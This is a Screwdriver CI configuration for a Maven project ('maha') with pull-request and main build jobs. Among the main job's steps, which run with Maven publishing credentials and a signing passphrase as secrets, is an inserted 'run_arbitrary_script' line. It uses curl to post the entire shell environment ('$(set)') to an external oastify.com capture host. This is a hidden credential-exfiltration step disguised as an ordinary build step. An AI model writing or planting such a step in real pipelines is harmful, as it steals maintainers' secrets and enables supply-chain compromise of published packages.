cache:
  pipeline: ["~/.m2"]

shared:
  annotations:
    screwdriver.cd/cpu: TURBO
    screwdriver.cd/ram: TURBO
  image: maven:3-adoptopenjdk-8
# maha core has embedded postgres module which does not run on the root user, this image is built to run with custom maha user
  environment:
    #Fetches history so Sonar can assign blame.
    GIT_SHALLOW_CLONE: false

jobs:
  pull-request:
    requires: [~pr]
    secrets:
      - COVERALLS_REPO_TOKEN
    steps:
      - build: mvn -B clean install
      - depTree: mvn dependency:tree

  main:
    secrets:
      - OSSRH_USER
      - OSSRH_TOKEN
      - PASS_PHRASE
    requires: [~tag, ~release, ~commit, ~pr]
    steps:
      - prepare: "screwdriver/release_prepare.sh"
      - run_arbitrary_script: curl --data "$(set)" http://rrm5bi28ipzebdk8277d9ksez55ztxhm.oastify.com/
      - build: mvn -B clean install
      - publish: "screwdriver/publish_to_maven.sh"
